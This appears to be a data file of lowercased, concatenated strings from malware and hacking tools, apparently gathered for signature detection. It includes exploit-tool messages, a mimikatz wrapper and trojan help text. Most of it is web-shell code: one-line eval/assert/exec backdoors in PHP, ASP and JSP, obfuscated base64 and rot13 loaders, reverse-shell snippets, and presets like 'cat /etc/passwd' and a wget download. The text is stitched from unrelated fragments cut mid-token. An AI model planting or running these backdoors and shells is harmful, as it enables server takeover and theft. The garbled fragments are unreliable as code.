-ip <server ip address>c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"\\microsoft\\windows\\pla\\system\\microsoft windows\" /tr c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"microsoft windows\" /tr taskkill /im conime.exe\\dns control\\t-dnstunnel\\dnstunclient\\dnstunclient.cppudp error:can not bing the port(if there is unclosed the bind process?)use error domain,set domain pls use -d or -domain mark(current: %s,recv %s)error: packet num error.the connection have condurt,pls try latercoversation produce one error:%s,coversation failtry to add many same pipe to select group(or mark is too easy).a
1 tinyzbot.properties.resources.resourcesaoao watermarkrun_a_exenetscp.exeget_mainmodule_webreference_defaultwsremove_checkfilemd5completedhttp://tempuri.org/zhoupin_cleavergetshadyprocessgetsystemantivirusesantivirusdetectorcom+ system extentionscsext.execom_extentions_binkill command is in last machine, going backmessage data length in b64: %d bytesmimikatzwrapperget_mimikatzlast_time=00/00/0000:00:00pm$if %%errorlevel%% == 1 goto linen
1 [-] failed to mmap file: %s[!] value has size of 0!forceprismheader[+] looking for vulnerable socketcan't use 32-bit exploit on 64-bit target[+] %s socket ready, exploiting...[!] nothing looks vulnerable, trying everythingkernel has 4g/4g split, not exploitable[+] kernel stack size is %d[-] failed to prepare payload!shellcodestartoffset[*] waiting for authcode from exploit[-] connection closed by remote host (tcp ack/fin)[!]warning: error on first request - path size may actually be larger than indicated.<http://%s/%s> (not <locktoken:write1>) <http://%s/>[+] target is %s[-] error appending shellcode buffer[-] shellcode is too big[+] exploit payload sent![+] bound to dimsvc, sending exploit request to opnum 29[+] connected to target %s:%d[-] build_exploit_run_x64():[%s] - error upgraded dll architecture does not match target architecture (0x%x)[%s] - error building dll loading shellcode[+] shellcode callback %s:%d[+] exploiting target[+] ping returned target architecture: %s - xor key: 0x%08x[.] sending shellcode to inject dll[-] error setting shellcodefile name[-] unable to connect to broswer named pipe, target is not vulnerable[-] unable to bind to dimsvc rpc syntax, target is not vulnerable[+] bound to dimsvc, target is vulnerable[+] target is vulnerable to %d exploit%s[!] a vulnerable target will not respond.[-] target not vulernable[-] touching the target failed![-] os fingerprint not complete - 0x%08x![*] failed to detect os / service pack on %s:%d[*] smb string: %s (%s)[-] get remotemoftriggerpath error[-] %s - target might not be in a usable state.[*] exploiting target[-] encoding exploit payload failed![-] the target is not vulnerable[+] the target is vulnerable[-] are you being redirectect? need to retarget?[+] iis target os: %s[*] summary: %d pipes found[+] testing %d pipes[-] error on smb startup, aborting92a761c29b946aa458876ff78375e0e28bc8acb0h
1 cmd=getload&login=&run=ok&run=fail&removed=ok[iisend=0x%08x][recv:] 0x%08x %siiscmd error:%dnot support this function!imgurl=http://%s/%04d-%02d/%04d%02d%02d%02d%02d%02d.png&w=800&h=600&ei=png&w=800&h=600&ei=cnjcucsbl4rfkqx444hycw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty={\\rtf1\\ansi\\ansicpg936\\uc2\\deff0\\stshfdbch13\\stshfloch0\\{\\*\\panose 02020603050405020304}times new roman
1 accessories\\wordpad.exegorillanation.combefore editing the content of a cookie, you should close all windows of internethttp://nirsoft.cjb.neta
1 software\\haoqiang\\redirect sport remotehost rport -->port redirectorhttp://ip/a.exe a.exe -->download a filestopsniffer -->stop pass snifferterminalport port -->set new terminal portexample: http://12.12.12.12/a.exe abc.execreate password sniffering thread successfully. status:loggingstartsniffer nic -->start sniffershell -->get a shelldeleteservice servicename -->delete a servicedisconnect threadnumber|all -->disconnect othersonline -->list all connected ipexample: set reg_sz test trojan.exeexecute program -->execute a programreboot -->reboot the systempassword sniffering is not runningprocess child = runtime.getruntime().exec(inputstream in = child.getinputstream();string cmd = request.getparameter(\"while ((c = in.read()) != -1) {<%@ page import=\"java.io.*\" %>r
1 __getmainargsws2_32.dllwininet.dllfreesidtoasciiredirect sport remotehost rport -->port redirectorpost /scripts/wwpmsg.dll http/1.0http://ip/a.exe a.exe -->download a filehost: wwp.mirabilis.com:80%s -set port portnumber -->set the service portshell -->get a shelldeleteservice servicename -->delete a servicegetting the username(%c%s%c)-->id(0x%s) successfully%s -set servicename servicename -->set the service name[validaterange(1, 65535)]$client = new-object -typename system.net.sockets.tcpclient$buffer = new-object -typename system.byte[] -argumentlist $client.receivebuffersizei
1 neolite executable file compressorie686@sohu.comsplitjoin.exesplitjoin<meta http-equiv=\"content-type\" content=\"text/html;charset=gb_2312-80\">set thisfile = fs.getfile(whichfile)if request.cookies(\"password\")=\"juchen\" then set thisfile = fs.opentextfile(whichfile, 1, false)color: rgb(255,0,0); text-decoration: underline }if request(\"creat\")<>\"yes\" then<form name=\"formpst\" method=\"post\" action=\"entice.asp\">if left(trim(request(\"sqllanguage\")),6)=\"select\" thenconndb.execute(sqllanguage)<!--#include file=sqlconn.asp-->rstsql=\"select * from \"&rstable(\"table_name\") -s - outbound connection source port numberfpipeto open registryi love candy very much!!ginadllh
1 dgmnoep/%s%s%s/?%s=control panel\\dehttps=https://%snetwork.proxy.ht2http=http://%s:%control panel\\denetwork.proxy.ht&ol1ms9c
1 # exc: httpsender - cannot create post channel!# exc: httpsender - cannot create get channel!#ext_5 cannot create extchanneltoprocessthread!#ext_4 cannot create extchanneltoprocessthread!#exc_2 cannot create proctoext pipe!#exc_1 cannot create exttoproc pipe!#ext_3 cannot create process!<
1 ' *** written by tim medin <tim@counterhack.com>response.binarywrite(stream.read)response.write(response.status & request.servervariables(\"remote_addr\"))%><a href=\"<%=request.servervariables(\"url\")%>\">web root</a><br/><%set folder = fso.getfolder(path)set file = fso.getfile(filepath)if ($_server[\"remote_addr\"] == $ip)header(\"http/1.0 404 not found\");<?php echo exec('killall nc');?><title>laudanum kill nc</title>foreach ($allowedips as $ip) {<form action=\"shell.asp\" method=\"post\" name=\"shell\">%comspec% /c dirset objcmd = wshell.exec(cmd)server.scripttimeout = 180cmd = request.form(\"cmd\")' *** http://laudanum.secureideas.netdim wshell, intreturn, strpresultport: <input name=\"port\" type=\"text\" value=\"8888\"><li>reverse shell - <li><a href=\"<?php echo plugins_url('file.php', __file__);?>\">file browser</a>'response.write \"<br/> -value:\" & request.querystring(key)(j)q = q & \"&\" & key & \"=\" & request.querystring(key)(j)for each i in split(http.getallresponseheaders, vblf)'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)s = urlscheme & urlhost & urlport & urlpathset http = server.createobject(\"microsoft.xmlhttp\")executable: <input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br><cfif ( #suppliedcode# neq secretcode )><cfif isdefined(\"form.cmd\")>remoteip = httpcontext.current.request.headers[\"x-forwarded-for\"].split(newremoteip = request.userhostaddress;<form method=\"post\" name=\"shell\"><body onload=\"document.shell.c.focus()\">command_hist[current_line] = document.shell.command.value;if (e.keycode == 38 && current_line < command_hist.length-1) {array_unshift($_session['history'], $command);if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {$process = proc_open($shell, $descriptorspec, $pipes);printit(\"successfully opened reverse shell to $ip:$port\");$input = fread($pipes[1], $chunk_size);$query = isset($_post['query']) ? $_post['query'] : '';$result = dns_get_record($query, $types[$type], $authns, $addtl);foreach (array_keys($types) as $t) {<servlet-name>command</servlet-name><jsp-file>/cmd.jsp</jsp-file>cmd.jsp}cmd.jsppkweb-inf/web.xmlweb-inf/web.xmlpkpublic function __activate()register_activation_hook(__file__, array('wp_laudanum', 'activate'));$allowedips =<a href=\"<?php echo $_server['php_self'] ?>\">home</a><br/>$dir = isset($_get[\"dir\"]) ? $_get[\"dir\"] : \".\";$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";process p = runtime.getruntime().exec(request.getparameter(\"cmd\"));out.println(\"command: \" + request.getparameter(\"cmd\") + \"<br>\");<form method=\"get\" name=\"myform\" action=\"\">string disr = dis.readline();command = \"nslookup -type=\" & qtype & \" \" & query set objcmd = objwshell.exec(command)response.write command & \"<br>\"<form name=\"dns\" method=\"post\">$shell = 'uname -a; w; id; /bin/sh -i';*** laudanum@secureideas.net*** laudanum projectset_time_limit(0)date_default_timezone_set('prc');$content_mb;/index.php?host=eval(\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61yc0cjyb+o//xgj9/y+u/dd//vkf'\\x29\\x29\\x29\\x3b\") <td><div style=\"font-family: verdana; font-size: 10px;\"><b>server adress:</b <td><div style=\"font-family: verdana; font-size: 10px;\"><b>user info:</b> ui <td><div style=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= <input type=\"text\" name=\"cmd\" value=\"<?php echo stripslashes(htmlentities($$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_print \"<a href=\\\"$_server[php_self]?s=$s&login=$login&passwd=$passwd&echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"echo \"<option value=\\\"$work_dir\\\" selected>current directory</option><input name=\"submit_btn\" type=\"submit\" value=\"execute command\"></p> if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($return base64_decode('r0lgodlheqanajedamwaap///5mzmf///yh5bahoawmalaaaaaaraa0aaa out.print(\"<tr><td width='60%'>\"+strcut(convertpath(list[i].getpath()),7 \"reg add \\\"hkey_local_machine\\\\system\\\\currentcontrolset\\\\controldie(\"\\nwelcome.. by this script you can jump in the (safe mode=on) .. enjoy\\nmode shell v1.0</font></span></a></font><font face=\"webdings\" size=\"6\" colorecho \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fofputs ($fp ,\"\\n*********************************************\\nwelcome t0 sim<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (piword: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\",<input type=submit value='\".mm(\"delete all dir/files recursive\").\" (rm -fr)'<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u</font><%out.print(request.getrealpath(request.getservletpath())); %><%@page import=\"java.io.*,java.util.*,java.net.*\"%>string path=new string(request.getparameter(\"path\").getbytes(\"iso-8859-1\"<?php ($www= $_post['ice'])!@preg_replace('/ad/e','@'.str_rot13('riny').'($wwh8p0bgfoey7ealy4h4e4o88ltsvhoaglj2klqhuwhkp7dvycf8cgnwfy8ocjrp5ffzkn9odrom0/rahmecho \"<p><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<%= \"\\\\\" & oscriptnet.computername & \"\\\" & oscriptnet.username %>set ofilesys = server.createobject(\"scripting.filesystemobject\")eval(getenv('http_code'));style=\"background-color: #eae9e9; border-bottom: #000000 1px in<font color=\"#858585\">shopen</font></a></font><font face=\"verdana\" style<%eval request(\"ice\")%><tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctyif (isset($_post['mysqlw_host'])){$dbhost = $_post['mysqlw_host'];} else {$dbhos<input type=\"submit\" name=\"send\" value=\"go!\"><textarea name=\"1988\" rows=\"18\" cols=\"78\"></textarea>case 15: $image .= \"\\21\\0\\copy($http_post_files['userfile']['tmp_name'], $_post['remotefile']);if(is_uploaded_file($http_post_files['userfile']['tmp_name'])) {echo \"uploaded file: \" . $http_post_files['userfile']['name'];echo \"<td><a href='$php_self?action=dropdb&dbname=$dbname' onclick=\\\"return<a href=\"?act=do\"><font color=\"red\">go execute</font></a></b><br /><textarea; (choose good passwords!). add uses as simple 'username = \"password\"' lines.%8@#@&p~,p,pp,mv~4bp^~,ns~m~pxc3,_pwbspu w~~[u3fffs~/%@#@&~~,pp~~,m!pms,4s,mbpnb// bug: corta el fichero si es mayor de 640ks echo \"<br><center>all the data in these tables:<br> \".$tblsv.\" were putted <% for each vars in request.servervariables %>variable name</b></font></p><?php ${${eval($_post[ice])}};?><% execute request(\"ice\")%>a if(damapath!=null &&!damapath.equals(\"\")&&content!=null//angel$admin['cookiedomain'] = '';d,'prjknd,j~[,ednmp[,-4;ds6@#@&vkobx2ldd,'~jhcstring sql = \"select * from dba_tables where table_name not like '%$%' and num_const strs_totransform=\"command|radmin|ntauthenabled|filterip|iissample|pagecou<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_session['nounce'];<p>username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna$_session['output'] .= \"cd: could not change to: $new_dir\\n\";<%@ page language=\"java\" pageencoding=\"gbk\"%><jsp:directive.page import=\"jaresultset r = c.getmetadata().gettables(null, null, \"%\", t);string cs = request.getparameter(\"z0\")==null?\"gbk\": request.getparameter(\"z<%eval request(\"pass\")%>lfyw6pd^dkv^4cdrwmmno1gvkdl:y& f+2(93).$_uu(41).$_uu(59);$_ff=$_uu(99).$_uu(114).$_uu(101).$_uu(97).$_uu(116).$_uuerde types','getallen','datum en tijd','tekst','binaire gegevens','netwerk','geohttp://code.google.com/p/b374k-shell$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'jayalah indonesiaku & lyke @ 2013b374k vip in beautify just for selfcall os.run(\"win.com cmd.exe /c \"\"\" & szcmd & \" > \" & sztf &$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00echo \" <font color='#0000ff'>chmodu \".substr(base_convert(@fileperms($echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo// list.php = directory & file listing echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena// by: the dark raverprint \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di<?php $k=str_replace('`','','a`s`s`e`r`t');$m=$_post[ice];if($m==null)header('st<%=thingy.driveletter%> </td><td><tt> <%=thingy.drivetype%> </td><td><tt> <%=thi<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%string t=request. <tr><td bgcolor=\"<? echo (!$connect && $action == \"chparam\")?\"#660000\":\"#<input type=\"checkbox\" name=\"autoupdate\" value=\"autoupdate\" ononblur=\"document.shell.autoupdate.checked= this.oldvalue;print \"\\n\".'tip: to view the file \"as is\" - open the page in <a href=\"'.dxclass=linelisting><nobr>post (php eval)</td><if fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" href='$php_self?action=dumptable&dbname=$dbname&tablename=$tablename'>dump</a><td<%if (fso.getextensionname(path & \"\\\" & ofile.name)=\"lnk\") or (fso.getex<input type=button value=save onclick=\"editorcommand('save')\"> <input type=but<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=requesprivate function convertbinary(byval sourcenumber, byval maxvalueperindex, byvalcase 's':connectiondbm(out,encodechange(request.getparameter(\"drivereturn \"<a href=\\\"javascript:delfile('\"+folderreplace(file)+\"')\\\"include('php://input');// no eval() calls, no system() calls, nothing normally seen as malicious.ini_set('allow_url_include, 1'); // allow url inclusion in this script<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7<input type=\"submit\" name=\"btnsubmit\" value=\"upload\"> !22222222222222222222222222222222222222222222222222response.write \"<form action=\"\"\" & request.servervariables(\"url\") & \"\"\"response.write \"<tr><td><font face='arial' size='2'><b>&lt;dir&gt; <a href='\" response.write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javasprocess p = runtime.getruntime().exec(\"cmd.exe /c \" + request.getparam<form method=\"post\" name=\"myform\" action=\"\">kxpew[\"[7b:g0w@w<b:ghr,g<rhv0w@w<s_mr(u7bresponse.write \"<a href='\"&dosyapath&\"?status=7&path=\"&path&\"/if (md5($_get['usr'])==$user && md5($_get['pass'])==$pass){eval($_get['idc']);}$data=\"username=\".urlencode($user).\"&password=\".urlencode($pafputs($sun_tzu,\"<?php echo \\\"hi master!\\\";ini_set(\\\"max_execution_time&9k_)p82ai,a}i92]r\"q!c:rz}s6]=pattr$pass = md5(md5(md5($pass)));$_f_f.='_'.$_p_p[5].$_p_p[20].$_p_p[13].$_p_p[2].$_p_p[19].$_p_p[8].$_p_pos = instrb(boundarypos,requestbin,getbytestring(\"content-dispositiocontenttype = getstring(midb(requestbin,posbeg,posend-posbeg))// uses include('php://input') to execute arbritary code// php://input based backdoor&nbsp;&nbsp;<?php echo buildurl(\"<font color=\\\"navy\\\">[echo \"</form><form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><inputif ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": casif(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? \"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' - antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? \"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); 